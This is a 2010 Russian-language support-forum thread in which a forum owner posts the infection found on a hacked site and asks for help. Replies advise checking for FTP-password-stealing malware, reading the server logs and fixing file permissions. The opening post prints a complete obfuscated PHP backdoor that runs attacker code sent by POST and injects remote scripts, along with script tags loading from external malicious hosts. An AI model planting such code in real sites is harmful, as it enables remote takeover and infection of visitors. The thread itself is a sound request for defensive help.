ExBB Community ExBB Community
 Сайт проекта ExBB Общение объединяет!
Войдите на форум при помощиВойти через loginza
 Чат на форуме      Помощь      Поиск      Пользователи     BanList BanList


 Страниц (1): [1]   

> Описание: помогите разобраться
monstYr
Отправлено: 12 марта 2010 — 13:30
Post Id



Пользователь
Newbie


Покинул форум
Сообщений всего: 16
Дата рег-ции: Апр. 2009  
Репутация: 0




Может кто-то сталкивался и поможет разобраться?

на главной форума такая гадость:
CODE:
<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygneXAyOScpKXtmdW5jdGlvbiB5cDI5KCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7aWYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8fCgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwnJywkcyk7fWlmKHByZWdfbWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14+XSo/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYocHJlZ19tYXRjaCgnI1tcLiBdd2lkdGhccyo9XHMqW1wnIl0/MCpbMC05XVtcJyI+IF18ZGlzcGxheVxzKjpccypub25lI2knLCR2KSYmIXN0cnN0cigkdiwnPycuJz4nKSkkcz1wcmVnX3JlcGxhY2UoJyMnLnByZWdfcXVvdGUoJHYsJyMnKS4nLio/PC9pZnJhbWU+I2lzJywnJywkcyk7JHM9c3RyX3JlcGxhY2UoJGE9YmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0J6Y21NOWFIUjBjRG92TDNSeVlYWmxiR1JwY21WamRDMTBhR0ZwYkdGdVpDNWpiMjB2YVcxaFoyVnpMelF3TVM1emFIUnRiQzV3YUhBZ1Bqd3ZjMk55YVhCMFBnPT0nKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzLDEpO2Vsc2VpZihzdHJwb3MoJHMsJzxhJykpJHM9JGEuJHM7cmV0dXJuJHM7fWZ1bmN0aW9uIHlwMjkyKCRhLCRiLCRjLCRkKXtnbG9iYWwkeXAyOTE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJHlwMjkxKSljYWxsX3VzZXJfZnVuYygkeXAyOTEsJGEsJGIsJGMsJGQpO2ZvcmVhY2goQG9iX2dldF9zdGF0dXMoMSlhcyR2KWlmKCgkYT0kdlsnbmFtZSddKT09J3lwMjknKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCd5cDI5Jyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JHlwMjlsPSgoJGE9QHNldF9lcnJvcl9oYW5kbGVyKCd5cDI5MicpKSE9J3lwMjkyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?>


на остальных индексных страницах:
CODE:
<script src=http://traveldirect-thailand.com/images/401.shtml.php ></script>


в ява скриптах в конце:
CODE:
document.write('<script src=http://onlyplaygame.com/services/comments.php ><\/script>');
document.write('<script src=http://onlyplaygame.com/services/comments.php ><\/script>');
document.write('<script src=http://onlyplaygame.com/services/comments.php ><\/script>');
document.write('<script src=http://crestereaiepurilor.lx.ro/images/pj.php ><\/script>');
document.write('<script src=http://traveldirect-thailand.com/images/401.shtml.php ><\/script>');
document.write('<script src=http://traveldirect-thailand.com/images/401.shtml.php ><\/script>');
document.write('<script src=http://traveldirect-thailand.com/images/401.shtml.php ><\/script>');
 
 
yura3d
Отправлено: 12 марта 2010 — 13:43
Post Id


Пользователь
ExBB Team
ExBB Developer
ExBB Mods Author


Покинул форум
Сообщений всего: 3394
Дата рег-ции: Февр. 2009  
Откуда: Минск, Беларусь
Репутация: 353




monstYr пишет:
Может кто-то сталкивался и поможет разобраться?

Перечитайте внимательно темы из этого раздела. Возможно, Ваш компьютер инфицирован вирусами или кейлоггерами, с помощью которых был получен несанкционированный доступ по FTP к Вашему сайту, и уже потом были изменены заражены скрипты форума. Особенную популярность в последнее время получили программы, крадущие пароли от FTP, хранящиеся в Total Commander. Проверьте Ваш компьютер на вирусы. Далее просмотрите логи доступа к серверу, если действительно была попытка атаки на Ваш форум через сами скрипты форума, то она должна быть там отражена. И, напоследок, проверьте правильность расстановки прав доступа на файлы и папки форума. Неправильная расстановка прав доступа может привести к несанкционированному доступу к Вашим данным со стороны других пользователей сервера (клиентов хостера). Подробное описание процесса расстановки прав доступ есть в вопросе Q3 из ExBB FAQ
 
 
RomAndry
Отправлено: 12 марта 2010 — 13:46
Post Id


Пользователь
Newbie


Покинул форум
Сообщений всего: 33
Дата рег-ции: Июнь 2009  
Откуда: Ukraine
Репутация: 6




В частности http://exbb.info/community/topic...=7&topic=116
И отредактируйте тему, удалив код вируса!
 
 
alexx
Отправлено: 12 марта 2010 — 13:54
Post Id


Пользователь
Advanced Member


Покинул форум
Сообщений всего: 495
Дата рег-ции: Февр. 2010  
Откуда: Россия
Репутация: 12




Еще совет- рекомендация.
При администрировании, используйте линукс ( поставьте в качестве второй системы), практически нет вирусов под него ( я не встречал).
Заливая файлы или работая на хостере, проверяйте антивирусов заливаемые файлы.
Тем самым вы избежите этих и других проблем.
 
 
monstYr
Отправлено: 13 марта 2010 — 08:24
Post Id



Пользователь
Newbie


Покинул форум
Сообщений всего: 16
Дата рег-ции: Апр. 2009  
Репутация: 0




Благодарю всех за дельные советы Здорово
 
 
Страниц (1): [1]
Сейчас эту тему просматривают: 1 (гостей: 1, зарегистрированных: 0)
« Уязвимости »

> Похожие темы: Взлом форума
Темы Форум Информация о теме Обновление
Предварительный просмотр тем оформления
На базе демонстрационного форума
Темы оформления Ответов: 30
Автор темы: yura3d
28 декабря 2018 — 11:56
Автор: 1Bot
Оптимизация страницы
Как оптимизировать страницу форума?
Общие вопросы Ответов: 40
Автор темы: m0ntag
30 мая 2013 — 06:51
Автор: CAB
Отображение списка online
Как отобразить список участников online на каждой странице форума
Обсуждение Ответов: 5
Автор темы: Марта
9 февраля 2010 — 22:09
Автор: yura3d
Видна статистика по скрытым темам в профилях пользователей
Статистика сообщений на форумах
Настройка форума Ответов: 30
Автор темы: Squatter
23 апреля 2017 — 11:54
Автор: NordWest
Гугл сёрч
проблемы форума с индексированием
Решение проблем Ответов: 1
Автор темы: Guyver
13 января 2019 — 08:27
Автор: Guyver
 



Все гости форума могут просматривать этот раздел.
Только администраторы и модераторы могут создавать новые темы в этом разделе.
Только администраторы и модераторы могут отвечать на сообщения в этом разделе.
 




Яндекс.Метрика   

Powered by ExBB
ExBB FM 1.0 RC1 by TvoyWeb.ru
InvisionExBB Style converted by Markus®

[Script Execution time: 0.0905]     [ ]